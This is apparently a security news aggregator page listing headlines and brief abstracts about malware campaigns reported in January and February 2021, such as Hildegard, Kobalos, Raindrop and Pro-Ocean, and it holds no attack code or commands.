The hacking group TeamTNT introduced a new piece of malware with an improved ability to steal Docker credentials. It was found exploiting Kubernetes systems.Cyware Alerts - Hacker News
February 13, 2021
New Agent Tesla Variants can Bypass Security Walls Full Text
Abstract
As researchers continue to block new attack vectors, actors behind Agent Tesla malware have been found launching new variants designed to infect Microsoft Antimalware Scan Interface (AMSI) itself.Cyware Alerts - Hacker News
February 13, 2021
Rising Security Concerns Over the Takedown of Emotet Full Text
Abstract
By the time law enforcement intervened, Emotet had infected more than 1.6 million machines and caused hundreds of millions of dollars in damage.Cyware Alerts - Hacker News
February 13, 2021
Microsoft said the number of web shells has doubled since last year Full Text
Abstract
In a blog post, the Redmond company said it detected roughly 140,000 web shells per month between August 2020 and January 2021, up from the 77,000 average it reported last year.ZDNet
February 11, 2021
Pre-Valentine’s Day Malware Attack Mimics Flower, Lingerie Stores Full Text
Abstract
Emails pretending to confirm hefty orders from lingerie shop Ajour Lingerie and flower store Rose World are actually spreading the BazaLoader malware.Threatpost
February 11, 2021
Android spyware strains linked to state-sponsored Confucius threat group Full Text
Abstract
First detected in 2013, Confucius has been linked to attacks on governments in Southeast Asia, and targeted strikes on Pakistani military personnel, Indian election officials, and nuclear agencies.ZDNet
February 11, 2021
Various Malware Lurking in Discord App to Target Gamers Full Text
Abstract
Research from Zscaler ThreatLabZ shows attackers using spam emails and legitimate-looking links to gaming software to serve up Epsilon ransomware, the XMRrig cryptominer and various data and token stealers.Threatpost
February 11, 2021
Military, Nuclear Entities Under Target By Novel Android Malware Full Text
Abstract
The two malware families have sophisticated capabilities to exfiltrate SMS messages, WhatsApp messaging content and geolocation.Threatpost
February 11, 2021
TrickBot’s BazarBackdoor malware is now coded in Nim to evade antivirus Full Text
Abstract
TrickBot's stealthy BazarBackdoor malware has been rewritten in the Nim programming language, likely to evade detection by security software.BleepingComputer
February 10, 2021
BazarBackdoor’s Stealthy Infiltration Evades Multiple SEGs Full Text
Abstract
The malware attack campaign, first observed in mid-December, carries pharmaceutical-themed invoices that contain references to a series of websites hosted on the “shop” domain.Cofense
February 10, 2021
LodaRAT Windows Malware Now Also Targets Android Devices Full Text
Abstract
A previously known Windows remote access Trojan (RAT) with credential-stealing capabilities has now expanded its scope to set its sights on users of Android devices to further the attacker's espionage motives. "The developers of LodaRAT have added Android as a targeted platform," Cisco Talos researchers said in a Tuesday analysis. "A new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities." Kasablanca, the group behind the malware, is said to have deployed the new RAT in an ongoing hybrid campaign targeting Bangladeshi users, the researchers noted. The reason why Bangladesh-based organizations have been specifically singled out for this campaign remains unclear, as is the identity of the threat actor. First documented in May 2017 by Proofpoint , Loda is an AutoIt malware typically delivered via phishing lures that's equipped to run a wide range of commands designed to record audio, video, and capture othThe Hacker News
February 9, 2021
2016 Facebook malware campaign resurfaces, India top victim Full Text
Abstract
A 2016 Facebook malware campaign, known to use a combination of Windows trojan, browser injections, clever scripting, and a bug in the social network's platform, has resurfaced in India.The Times Of India
February 9, 2021
TeamTNT Back at it Again - Kubernetes Edition Full Text
Abstract
Unit42 researchers discovered a new malware, Hildegard, that is being leveraged to launch cryptojacking attacks on Kubernetes clusters.Cyware Alerts - Hacker News
February 8, 2021
Police Seize $60 Million of Bitcoin That Was Generated Via Installing Malware Full Text
Abstract
The officials of Germany have recently seized a digital wallet that was assumed to carry $60 million in bitcoins; all these bitcoins were acquired through fraudulent online activity.GB Hackers
February 08, 2021
Android app joins the dark side, sends malware update to millions Full Text
Abstract
Google has removed a popular Android barcode scanner app with over 10 million installs from the Play Store after researchers found that it turned malicious following a December 2020 update.BleepingComputer
February 8, 2021
CinaRAT Resurfaces With New Evasive Tactics and Techniques Full Text
Abstract
Different versions of multi-staged loaders attempt to inject and execute CinaRAT within the victim’s host memory. CinaRAT code is available on GitHub; generally it's just a rebranded QuasarRAT.Morphisec
February 6, 2021
Microsoft Tailing Dynamically Generated Email Infrastructure Full Text
Abstract
Microsoft digs into emerging email infrastructure, consisting of two segments named StrangeU and RandomU, that send over a million malware-laden emails each month.Cyware Alerts - Hacker News
February 06, 2021
The Great Suspender Chrome extension’s fall from grace Full Text
Abstract
Google has forcibly uninstalled the immensely popular 'The Great Suspender' extension from Google Chrome and classified it as malware.BleepingComputer
February 6, 2021
Watch out! ‘The Great Suspender’ Chrome extension contains Malware Full Text
Abstract
Google removed the popular The Great Suspender from the official Chrome Web Store for containing malware and deactivated it from users' PCs. Google on Thursday removed The Great Suspender extension from the Chrome Web Store. Millions of users...Security Affairs
February 06, 2021
WARNING — Hugely Popular ‘The Great Suspender’ Chrome Extension Contains Malware Full Text
Abstract
Google on Thursday removed The Great Suspender , a popular Chrome extension used by millions of users, from its Chrome Web Store for containing malware. It also took the unusual step of deactivating it from users' computers. "This extension contains malware," read a terse notification from Google, but it has since emerged that the add-on stealthily added features that could be exploited to execute arbitrary code from a remote server, including tracking users online and committing advertising fraud. "The old maintainer appears to have sold the extension to parties unknown, who have malicious intent to exploit the users of this extension in advertising fraud, tracking, and more," Calum McConnell said in a GitHub post. The extension, which had more than two million installs before it was disabled, would suspend tabs that aren't in use, replacing them with a blank gray screen until they were reloaded upon returning to the tabs in question. Signs of theThe Hacker News
February 05, 2021
Malicious extension abuses Chrome sync to steal users’ data Full Text
Abstract
The Google Chrome Sync feature can be abused by threat actors to harvest information from compromised computers using maliciously-crafted Chrome browser extensions.BleepingComputer
February 5, 2021
TeamTNT group uses Hildegard Malware to target Kubernetes Systems Full Text
Abstract
The TeamTNT hacker group has been employing a new piece of malware, dubbed Hildegard, to target Kubernetes installs. The hacking group TeamTNT has been employing a new piece of malware, dubbed Hildegard, in a series of attacks targeting Kubernetes...Security Affairs
February 5, 2021
Hackers Hijacking Google Search Results via Backdoored Browser Extensions Full Text
Abstract
Cybersecurity researchers at Avast have recently reported a huge campaign comprised of dozens of malicious Chrome and Edge browser extensions along with...Cyber Security News
February 4, 2021
Whitespace Steganography Conceals Web Shell in PHP Malware Full Text
Abstract
The web shell provides attackers with tools to work with files and databases on the targeted server, collect sensitive information, infect files, and conduct brute force attacks.Sucuri
February 4, 2021
The Drovorub Mystery: Malware NSA Warned About Can’t Be Found Full Text
Abstract
An advisory by the NSA and the FBI shares information on how Drovorub works, how it can be detected, and how organizations can protect their systems against attacks involving the malware.Security Week
February 3, 2021
TeamTNT launches cryptojacking operation on Kubernetes clusters Full Text
Abstract
Although the malware is still under development and the campaign has not spread widely, Unit 42 believes the attacker will soon improve the tools and start a large-scale deployment.SCMagazine
February 3, 2021
Emotet’s Takedown: Have We Seen the Last of the Malware? Full Text
Abstract
A week after law enforcement agencies said they took down Emotet, there has been no sign of the prolific malware.Threatpost
February 3, 2021
New Malware Hijacks Kubernetes Clusters to Mine Monero Full Text
Abstract
Researchers warn that the Hildegard malware is part of ‘one of the most complicated attacks targeting Kubernetes.’Threatpost
February 3, 2021
New Trickbot Malware Component Performs Local Network Reconnaissance Full Text
Abstract
Trickbot recently added a fresh module to scan local network systems with open ports for quick lateral movement. Named masrv, the component incorporates a copy of the Masscan open-source utility.Cyware Alerts - Hacker News
February 03, 2021
Over a Dozen Chrome Extensions Caught Hijacking Google Search Results for Millions Full Text
Abstract
New details have emerged about a vast network of rogue extensions for Chrome and Edge browsers that were found to hijack clicks to links in search results pages to arbitrary URLs, including phishing sites and ads. Collectively called " CacheFlow " by Avast, the 28 extensions in question — including Video Downloader for Facebook, Vimeo Video Downloader, Instagram Story Downloader, VK Unblock — made use of a sneaky trick to mask its true purpose: Leverage Cache-Control HTTP header as a covert channel to retrieve commands from an attacker-controlled server. All the backdoored browser add-ons have been taken down by Google and Microsoft as of December 18, 2020, to prevent more users from downloading them from the official stores. According to telemetry data gathered by the firm, the top three infected countries were Brazil, Ukraine, and France, followed by Argentina, Spain, Russia, and the U.S. The CacheFlow sequence began when unsuspecting users downloaded one of theThe Hacker News
February 03, 2021
A New Linux Malware Targeting High-Performance Computing Clusters Full Text
Abstract
High-performance computing clusters belonging to university networks as well as servers associated with government agencies, endpoint security vendors, and internet service providers have been targeted by a newly discovered backdoor that gives attackers the ability to execute arbitrary commands on the systems remotely. Cybersecurity firm ESET named the malware " Kobalos " — a nod to a " mischievous creature " of the same name from Greek mythology — for its "tiny code size and many tricks." "Kobalos is a generic backdoor in the sense that it contains broad commands that don't reveal the intent of the attackers," researchers Marc-Etienne M. Léveillé and Ignacio Sanmillan said in a Tuesday analysis. "In short, Kobalos grants remote access to the file system, provides the ability to spawn terminal sessions, and allows proxying connections to other Kobalos-infected servers." Besides tracing the malware back to attacks against a nuThe Hacker News
February 2, 2021
High-performance computing malware targeting Linux, Solaris and possibly Microsoft Full Text
Abstract
The attacks have been spread out between the U.S., Europe, and Asia, and have included HPC clusters as well as university systems, a large internet service provider, personal systems, and marketing and hosting firms.SCMagazine
February 2, 2021
Destroying the Destroyer - Malware Edition Full Text
Abstract
Dubbed Operation LadyBird, Emotet's infrastructure was taken down by the joint collaboration between law enforcement agencies from the U.S., the U.K., Canada, along with Europol and Eurojust.Cyware Alerts - Hacker News
February 02, 2021
Agent Tesla Malware Spotted Using New Delivery & Evasion Techniques Full Text
Abstract
Security researchers on Tuesday uncovered new delivery and evasion techniques adopted by Agent Tesla remote access trojan (RAT) to get around defense barriers and monitor its victims. Typically spread through social engineering lures, the Windows spyware not only now targets Microsoft's Antimalware Scan Interface ( AMSI ) in an attempt to defeat endpoint protection software, it also employs a multi-stage installation process and makes use of Tor and Telegram messaging API to communicate with a command-and-control (C2) server. Cybersecurity firm Sophos , which observed two versions of Agent Tesla — version 2 and version 3 — currently in the wild, said the changes are yet another sign of Agent Tesla's constant evolution designed to make a sandbox and static analysis more difficult. "The differences we see between v2 and v3 of Agent Tesla appear to be focused on improving the success rate of the malware against sandbox defenses and malware scanners, and on providing moreThe Hacker News
February 2, 2021
TrickBot Continues Resurgence with Port-Scanning Module Full Text
Abstract
The infamous malware has incorporated the legitimate Masscan tool, which looks for open TCP/IP ports with lightning-fast results.Threatpost
February 2, 2021
Android Gets Its New Malware for the Year Full Text
Abstract
Dubbed Oscorp, the malware abuses accessibility services in Android devices to steal user credentials and media content. The malware gets its name from the title of the login page of its C2 server.Cyware Alerts - Hacker News
February 2, 2021
Kobalos, a complex Linux malware targets high-performance computing clusters Full Text
Abstract
ESET experts uncovered a previously undocumented piece of malware that had been observed targeting high-performance computing clusters (HPC). ESET analyzed a new piece of malware, dubbed Kobalos, that was employed in attacks against high-performance...Security Affairs
February 2, 2021
New Sophisticated Multiplatform Malware ‘Kobalos’ Targets Linux Supercomputers Full Text
Abstract
Once the malware has landed on a supercomputer, the code buries itself in an OpenSSH server executable and will trigger the backdoor if a call is made through a specific TCP source port.ZDNet
February 02, 2021
Trickbot malware now maps victims’ networks using Masscan Full Text
Abstract
The Trickbot malware has been upgraded with a network reconnaissance module designed to survey local networks after infecting a victim's computer.BleepingComputer
February 02, 2021
Malicious script steals credit card info stolen by other hackers Full Text
Abstract
A threat actor has infected an e-commerce store with a custom credit card skimmer designed to siphon data stolen by a previously deployed Magento card stealer.BleepingComputer
February 02, 2021
New Linux malware steals SSH credentials from supercomputers Full Text
Abstract
A new backdoor has been targeting supercomputers across the world, often stealing the credentials for secure network connections by using a trojanized version of the OpenSSH software.BleepingComputer
February 1, 2021
Experts discovered a new Trickbot module used for lateral movement Full Text
Abstract
Experts spotted a new Trickbot module that is used to scan local networks and make lateral movement inside the target organization. Cybersecurity researchers discovered a new module of the Trickbot malware, dubbed 'masrv', that is used to scan a local...Security Affairs
February 1, 2021
DanaBot Back to the Grind Full Text
Abstract
Instead of demanding an immediate ransom from victims, Danabot is focused on gaining persistence and stealing data that can be monetized later.Cyware Alerts - Hacker News
February 1, 2021
Alleged Gaming Software Supply-Chain Attack Installs Spyware Full Text
Abstract
Researchers allege that software used for downloading Android apps onto PCs and Macs has been compromised to install malware onto victim devices.Threatpost
February 01, 2021
Android emulator supply-chain attack targets gamers with malware Full Text
Abstract
ESET researchers have discovered that the updating mechanism of NoxPlayer, an Android emulator for Windows and macOS, made by Hong Kong-based company BigNox, was compromised by an unknown threat actor and used to infect gamers with malware.BleepingComputer
February 01, 2021
A New Software Supply‑Chain Attack Targeted Millions With Spyware Full Text
Abstract
Cybersecurity researchers today disclosed a new supply chain attack compromising the update mechanism of NoxPlayer, a free Android emulator for PCs and Macs. Dubbed " Operation NightScout " by Slovak cybersecurity firm ESET, the highly-targeted surveillance campaign involved distributing three different malware families via tailored malicious updates to selected victims based in Taiwan, Hong Kong, and Sri Lanka. NoxPlayer, developed by Hong Kong-based BigNox, is an Android emulator that allows users to play mobile games on PC, with support for keyboard, gamepad, script recording, and multiple instances. It is estimated to have over 150 million users in more than 150 countries. First signs of the ongoing attack are said to have originated around September 2020, from when the compromise continued until "explicitly malicious activity" was uncovered this week, prompting ESET to report the incident to BigNox. "Based on the compromised software in question anThe Hacker News
February 01, 2021
New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers Full Text
Abstract
A financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research. Deployed by the China-based cybercrime group Rocke , the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up. "Pro-Ocean uses known vulnerabilities to target cloud applications," the researchers detailed. "In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ( CVE-2016-3088 ), Oracle WebLogic ( CVE-2017-10271 ) and Redis (unsecure instances)." "Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently." First documentedThe Hacker News
February 1, 2021
Trickbot Trojan Back from the Dead in New Campaign Full Text
Abstract
Infamous Trojan is spreading again, says Menlo SecurityInfosecurity Magazine
January 31, 2021
Pro-Ocean Malware Has New Wings Full Text
Abstract
Palo Alto is alerting organizations about new updates in Rocke Group’s new version of malware that was used throughout 2018 and 2019 to illegally mine Monero from infected Linux machines.Cyware Alerts - Hacker News
January 30, 2021
Is TrickBot Indestructible? Full Text
Abstract
After a takedown attempt in 2020 by global law enforcement that was not entirely successful, a new TrickBot version has arrived.Cyware Alerts - Hacker News
January 29, 2021
Here’s how law enforcement’s Emotet malware module works Full Text
Abstract
New research released today provides greater insight into the Emotet module created by law enforcement that will uninstall the malware from infected devices in April.BleepingComputer
January 29, 2021
Emotet - Soon to be Dead and Buried Full Text
Abstract
Emotet, one of the most active and dangerous botnets, has been taken down by international authorities, in an operation coordinated by Europol and Eurojust.Cyware Alerts - Hacker News
January 29, 2021
New Pro-Ocean malware worms through Apache, Oracle, Redis servers Full Text
Abstract
The financially-motivated Rocke hackers are using a new piece of cryptojacking malware called Pro-Ocean to target vulnerable instances of Apache ActiveMQ, Oracle WebLogic, and Redis.BleepingComputer
January 29, 2021
Pro-Ocean: Rocke Group’s New Cryptojacking Malware Full Text
Abstract
Pro-Ocean uses known vulnerabilities to target cloud applications. Additionally, it attempts to remove other malware and miners including Luoxk, BillGates, XMRig, and Hashfish before installation.Palo Alto Networks
January 29, 2021
New Malware Campaign Targeting Security Researchers Who Are Working in Vulnerability Research Full Text
Abstract
The Threat Analysis Group has recently detected an ongoing campaign targeting the security researchers who are working on vulnerability analysis and development...Cyber Security News
January 29, 2021
Oscorp, a new Android malware targets Italian users Full Text
Abstract
Researchers at the Italian CERT warn of new Android malware dubbed Oscorp that abuses accessibility services for malicious purposes. Researchers from security firm AddressIntel spotted a new Android malware dubbed Oscorp, its name comes from the title...Security Affairs
January 28, 2021
Cryptojacking malware targeting cloud apps gets new upgrades, worming capability Full Text
Abstract
A piece of cryptojacking malware with a penchant for targeting the cloud has gotten some updates that make it easier to spread and harder for organizations to detect when their cloud applications have been commandeered.SCMagazine
January 28, 2021
Babuk Locker: Mediocre, But Gets the Job Done Full Text
Abstract
The code, its execution, the ways the operators communicate with victims and the threats to the stolen data have been labeled “unprofessional.” This does not mean that the malware is harmless.Security Boulevard
January 28, 2021
Italy CERT Warns of a New Credential Stealing Android Malware Full Text
Abstract
Researchers have disclosed a new family of Android malware that abuses accessibility services in the device to hijack user credentials and record audio and video. Dubbed " Oscorp " by Italy's CERT-AGID, the malware "induce(s) the user to install an accessibility service with which [the attackers] can read what is present and what is typed on the screen." So named because of the title of the login page of its command-and-control (C2) server, the malicious APK (called "Assistenzaclienti.apk" or "Customer Protection") is distributed via a domain named "supportoapp[.]com," which upon installation, requests intrusive permissions to enable the accessibility service and establishes communications with a C2 server to retrieve additional commands. Furthermore, the malware repeatedly reopens the Settings screen every eight seconds until the user turns on permissions for accessibility and device usage statistics, thus pressurizing the uThe Hacker News
January 27, 2021
TeamTNT Cloaks Malware With Open-Source Tool Full Text
Abstract
The detection-evasion tool, libprocesshider, hides TeamTNT’s malware from process-information programs.Threatpost
January 27, 2021
Linux malware uses open-source tool to evade detection Full Text
Abstract
AT&T Alien Labs security researchers have discovered that the TeamTNT cybercrime group upgraded their Linux crypto-mining with open-source detection evasion capabilities.BleepingComputer
January 27, 2021
Cryptomining Malware Takes Center Stage Again Full Text
Abstract
Soaring bitcoin rates are motivating a large number of cybercriminals to resort to cryptomining, which has increased by 53% quarter-on-quarter in the final three months of 2020, as per a report by Avira.Cyware Alerts - Hacker News
January 26, 2021
DanaBot Malware Roars Back into Relevancy Full Text
Abstract
Sophisticated and dangerous, DanaBot has resurfaced after laying dormant for seven months.Threatpost
January 26, 2021
LuckyBoy Malvertising Campaign Employs Cloaking and Obfuscation Techniques Full Text
Abstract
Cybersecurity experts found a sophisticated malvertising campaign that comes with strong obfuscation techniques to avoid detection by security solutions in iOS, Android, and even Xbox systems.Cyware Alerts - Hacker News
January 26, 2021
Watch out as new Android malware spreads through WhatsApp Full Text
Abstract
As reported by researchers ReBensk and Lukas Stefanko, a new malware spreads through Whatsapp messages when it auto-replies to any messaging conversations using a malicious link that leads to a fake Huawei app.Hackread
January 26, 2021
Cryptomining DreamBus botnet targets Linux servers Full Text
Abstract
Researchers at Zscaler’s ThreatLabZ team recently analyzed a Linux-based malware family, tracked as DreamBus Botnet, which is a variant of SystemdMiner. The bot is composed of a series of ELF binaries and Unix shell scripts.Security Affairs
January 25, 2021
QNAP Network Devices Targeted by New Dovecat Malware Full Text
Abstract
QNAP is warning unsuspecting customers of an ongoing malware campaign that exploits NAS devices to mine bitcoin while hogging all of the CPU and memory resources.Cyware Alerts - Hacker News
January 25, 2021
Building towards the richest and most interconnected malware ecosystem Full Text
Abstract
During the last few months, VirusTotal has included additional meaningful relationships to create a rich ecosystem that interconnects samples, URLs, domains, and IP addresses.Virus Total
January 25, 2021
Twenty-three SUNBURST Targets Identified Full Text
Abstract
Researchers found that out of all the companies and organizations that installed a backdoored SolarWinds Orion update, the majority were never targeted by the threat actors using Sunburst.Netresec
January 24, 2021
Beware — A New Wormable Android Malware Spreading Through WhatsApp Full Text
Abstract
A newly discovered Android malware has been found to propagate itself through WhatsApp messages to other contacts in order to expand what appears to be an adware campaign. "This malware spreads via victim's WhatsApp by automatically replying to any received WhatsApp message notification with a link to [a] malicious Huawei Mobile app," ESET researcher Lukas Stefanko said. The link to the fake Huawei Mobile app, upon clicking, redirects users to a lookalike Google Play Store website. Once installed, the wormable app prompts victims to grant it notification access, which is then abused to carry out the wormable attack. Specifically, it leverages WhatApp's quick reply feature — which is used to respond to incoming messages directly from the notifications — to send out a reply to a received message automatically. Besides requesting permissions to read notifications, the app also requests intrusive access to run in the background as well as to draw over other apps,The Hacker News
January 23, 2021
Gamarue malware found in UK Govt-funded laptops for homeschoolers Full Text
Abstract
Reportedly, Bradford school employees received several laptops to aid in homeschooling vulnerable students. However, the laptops came pre-installed with the virus. Many school employees shared virus details on an online forum.Hackread
January 22, 2021
New FreakOut Malware Actively Targeting Linux Devices Full Text
Abstract
Researchers reported FreakOut botnet, whose capabilities range from scanning ports and stealing data to launching DDoS and cryptomining attacks, targets unpatched Linux systems.Cyware Alerts - Hacker News
January 22, 2021
More Malware May Be Lurking on Govt School Laptops Full Text
Abstract
Scheme to support remote learning backfiresInfosecurity Magazine
January 21, 2021
Dovecat crypto-miner is targeting QNAP NAS devices Full Text
Abstract
QNAP is warning customers of a new piece of malware dubbed Dovecat that is targeting NAS devices to mine cryptocurrency. Taiwanese vendor QNAP has published a security advisory to warn customers of a new piece of malware named Dovecat that is targeting...Security Affairs
January 21, 2021
SQL Server Malware Tied to Iranian Software Firm, Researchers Allege Full Text
Abstract
Researchers have traced the origins of a campaign – infecting SQL servers to mine cryptocurrency – back to an Iranian software firm.Threatpost
January 21, 2021
UK govt gives malware infected laptops to vulnerable students Full Text
Abstract
Some of the laptops distributed by the UK Department for Education (DfE) to vulnerable students have been found to be infected with malware as reported by the BBC.BleepingComputer
January 21, 2021
QNAP warns users to secure NAS devices against Dovecat malware Full Text
Abstract
QNAP urges customers to secure their network-attached storage (NAS) devices against an ongoing malware campaign that infects and exploits them to mine bitcoin without their knowledge.BleepingComputer
January 21, 2021
MrbMiner Crypto-Mining Malware Links to Iranian Software Company Full Text
Abstract
A relatively new crypto-mining malware that surfaced last year and infected thousands of Microsoft SQL Server (MSSQL) databases has now been linked to a small software development company based in Iran. The attribution was made possible due to an operational security oversight, said researchers from cybersecurity firm Sophos, that led to the company's name inadvertently making its way into the cryptominer code. First documented by Chinese tech giant Tencent last September, MrbMiner was found to target internet-facing MSSQL servers with the goal of installing a cryptominer, which hijacks the processing power of the systems to mine Monero and funnel them into accounts controlled by the attackers. The name "MrbMiner" comes after one of the domains used by the group to host their malicious mining software. "In many ways, MrbMiner's operations appear typical of most cryptominer attacks we've seen targeting internet-facing servers," said Gabor SzappaThe Hacker News
January 21, 2021
SolarWinds Attack: Microsoft sheds light on Solorigate second-stage activation Full Text
Abstract
Microsoft's report provides details of the entire SolarWinds attack chain with a deep dive in the second-stage activation of malware and tools. Microsoft published a new report that includes additional details of the SolarWinds supply chain attack....Security Affairs
January 21, 2021
LuckyBoy Multi-stage Malvertising Campaign Targets iOS, Android, XBox Users Full Text
Abstract
Should it run on a target environment, the malware executes a tracking pixel programmed to redirect the user to malicious content, including phishing pages and fake software updates.Security Week
January 21, 2021
Hundreds of Networks Still Host Devices Infected With VPNFilter Malware Full Text
Abstract
The VPNFilter malware is still present in hundreds of networks and malicious actors could take control of the infected devices, according to researchers at cybersecurity firm Trend Micro.Security Week
January 20, 2021
ElectroRAT: Yet Another Golang Multi-Platform Malware Full Text
Abstract
Security experts have raised an alarm against a new threat, dubbed ElectroRat, luring Windows, Linux, and macOS users to download malicious applications to embezzle cryptocurrency.Cyware Alerts - Hacker News
January 20, 2021
Coin-Mining Malware Volumes Soar 53% in Q4 2020 Full Text
Abstract
Surging value of digital currencies is sparking fresh interestInfosecurity Magazine
January 19, 2021
Fourth SolarWinds malware strain shows diversity of tactics Full Text
Abstract
While Teardrop was delivered by the original Sunburst backdoor in early July 2020, Raindrop was used just under two weeks later for spreading laterally across the victim’s network, Symantec said in a report.SCMagazine
January 19, 2021
Fourth SolarWinds malware strain shows diversity of tactics, need to focus on detection, response Full Text
Abstract
Researchers have found a fourth strain of malware – Raindrop – that was used in the SolarWinds supply chain attack, a loader similar to the Teardrop tool. But while Teardrop was delivered by the original Sunburst backdoor in early July 2020, Raindrop was used just under two weeks later for spreading laterally across the victim’s…SCMagazine
January 19, 2021
Raindrop, a fourth malware employed in SolarWinds attacks Full Text
Abstract
The threat actors behind the SolarWinds attack used malware dubbed Raindrop for lateral movement and deploying additional payloads. Security experts from Symantec revealed that threat actors behind the SolarWinds supply chain attack leveraged a malware...Security Affairs
January 19, 2021
SolarWinds Malware Arsenal Widens with Raindrop Full Text
Abstract
The post-compromise backdoor installs Cobalt Strike to help attackers move laterally through victim networks.Threatpost
January 19, 2021
Researchers Discover Raindrop — 4th Malware Linked to the SolarWinds Attack Full Text
Abstract
Cybersecurity researchers have unearthed a fourth new malware strain—designed to spread the malware onto other computers in victims' networks—which was deployed as part of the SolarWinds supply chain attack disclosed late last year. Dubbed "Raindrop" by Broadcom-owned Symantec, the malware joins the likes of other malicious implants such as Sunspot , Sunburst (or Solorigate), and Teardrop that were stealthily delivered to enterprise networks. The latest finding comes amid a continued probe into the breach, suspected to be of Russian origin , that has claimed a number of U.S. government agencies and private sector companies. "The discovery of Raindrop is a significant step in our investigation of the SolarWinds attacks as it provides further insights into post-compromise activity at organizations of interest to the attackers," Symantec researchers said . The cybersecurity firm said it discovered only four samples of Raindrop to date that were used to dThe Hacker News
January 19, 2021
Google Removed 164 Apps Downloaded a Total of 10 Million Times From Google Play Full Text
Abstract
Google has recently removed 164 apps from Google Play since they were showing disruptive ads, which is considered malicious. These apps...Cyber Security News
January 19, 2021
Researchers Identify Fourth Malware Strain Named Raindrop in SolarWinds Attack Full Text
Abstract
Symantec identified another malware strain that was used during the SolarWinds supply chain attack, bringing the total number to four, after the likes of Sunspot, Sunburst (Solorigate), and Teardrop.ZDNet
January 19, 2021
FreakOut malware exploits critical bugs to infect Linux hosts Full Text
Abstract
An active malicious campaign is currently targeting Linux devices running software with critical vulnerabilities that powers network-attached storage (NAS) devices or is used for developing web applications and portals.BleepingComputer
January 19, 2021
Researchers Discover New Malicious Push Notification Campaign Rapidly Growing In Size Full Text
Abstract
Indelible discovered the “PushBug” campaign, which is a highly resilient operation, spread across more than 100 domains and installing browser-based activity that is difficult to detect.Yahoo! Finance
January 19, 2021
FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities Full Text
Abstract
An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in Linux devices to co-opt the systems into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency. The attacks involve a new malware variant called " FreakOut " that leverages newly patched flaws in TerraMaster, Laminas Project (formerly Zend Framework), and Liferay Portal, according to Check Point Research's new analysis published today and shared with The Hacker News. Attributing the malware to be the work of a long-time cybercrime hacker — who goes by the aliases Fl0urite and Freak on HackForums and Pastebin as early as 2015 — the researchers said the flaws — CVE-2020-28188 , CVE-2021-3007 , and CVE-2020-7961 — were weaponized to inject and execute malicious commands in the server. Regardless of the vulnerabilities exploited, the end goal of the attacker appears to be to download and execute a Python script named &quoThe Hacker News
January 18, 2021
Rogue: The Evolution of Next Level Malware Development Package Full Text
Abstract
The Rogue malware targets Android devices with a keylogger, allowing attackers to monitor the use of websites and apps to steal login credentials and other sensitive data.Cyware Alerts - Hacker News
January 16, 2021
TA551 Now Spreading IcedID Stealer via Spoofed Emails Full Text
Abstract
Cybercriminal group TA551 was found hijacking an ongoing email conversation to spread information-stealing malware such as Ursnif, Valak, and IcedID, Palo Alto Networks revealed.Cyware Alerts - Hacker News
January 15, 2021
Expert launched Malvuln, a project to report flaws in malware Full Text
Abstract
The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.com, the first platform exclusively dedicated...Security Affairs
January 15, 2021
Google Boots 164 Apps from Play Marketplace for Shady Ad Practices Full Text
Abstract
The tech giant removes 164 more offending Android apps after banning software showing this type of behavior from the store last year.Threatpost
January 15, 2021
Researchers Disclose Undocumented Chinese Malware Used in Recent Attacks Full Text
Abstract
Cybersecurity researchers have disclosed a series of attacks by a threat actor of Chinese origin that has targeted organizations in Russia and Hong Kong with malware — including a previously undocumented backdoor. Attributing the campaign to Winnti (or APT41), Positive Technologies dated the first attack to May 12, 2020, when the APT used LNK shortcuts to extract and run the malware payload. A second attack detected on May 30 used a malicious RAR archive file consisting of shortcuts to two bait PDF documents claimed to be a curriculum vitae and an IELTS certificate. The shortcuts themselves contain links to pages hosted on Zeplin, a legitimate collaboration tool for designers and developers that are used to fetch the final-stage malware that, in turn, includes a shellcode loader ("svchast.exe") and a backdoor called Crosswalk ("3t54dE3r.tmp"). Crosswalk, first documented by FireEye in 2017, is a bare-bones modular backdoor capable of carrying out system rThe Hacker News
January 14, 2021
New Malware That Uses WiFi BSSID to Determine the Victim’s Location Full Text
Abstract
Xavier Mertens, a cybersecurity researcher at the SANS Internet Storm Center, recently identified malware that uses an interesting method to discover the victim's...Cyber Security News
January 14, 2021
Operation Spalax, an ongoing malware campaign targeting Colombian entities Full Text
Abstract
Security experts from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian government institutions and private companies. Malware researchers from ESET uncovered an ongoing surveillance campaign, dubbed Operation...Security Affairs
January 14, 2021
Experts Uncover Malware Attacks Against Colombian Government and Companies Full Text
Abstract
Cybersecurity researchers took the wraps off an ongoing surveillance campaign directed against Colombian government institutions and private companies in the energy and metallurgical industries. In a report published by ESET on Tuesday, the Slovak internet security company said the attacks — dubbed "Operation Spalax" — began in 2020, with the modus operandi sharing some similarities with an APT group targeting the country since at least April 2018, but also differing in other ways. The overlaps come in the form of phishing emails, which have similar topics and pretend to come from some of the same entities that were used in a February 2019 operation disclosed by QiAnXin researchers, and subdomain names used for command-and-control (C2) servers. However, the two campaigns diverge in the attachments used for phishing emails, the remote access trojans (RATs) deployed, and the C2 infrastructure employed to fetch the malware dropped. The attack chain begins with the targetThe Hacker News
January 14, 2021
‘Rogue’ Android RAT Can Take Control of Devices, Steal Data Full Text
Abstract
Dubbed Rogue, the Trojan is the work of Triangulum and HeXaGoN Dev, known Android malware authors that have been selling their malicious products on underground markets for several years.Security Week
January 13, 2021
Sunspot malware scoured servers for SolarWinds builds that it could weaponize Full Text
Abstract
Software company says 2 customer inquiries, in hindsight, appear linked to supply-chain attackSCMagazine
January 13, 2021
Rogue Android RAT emerges from the darkweb Full Text
Abstract
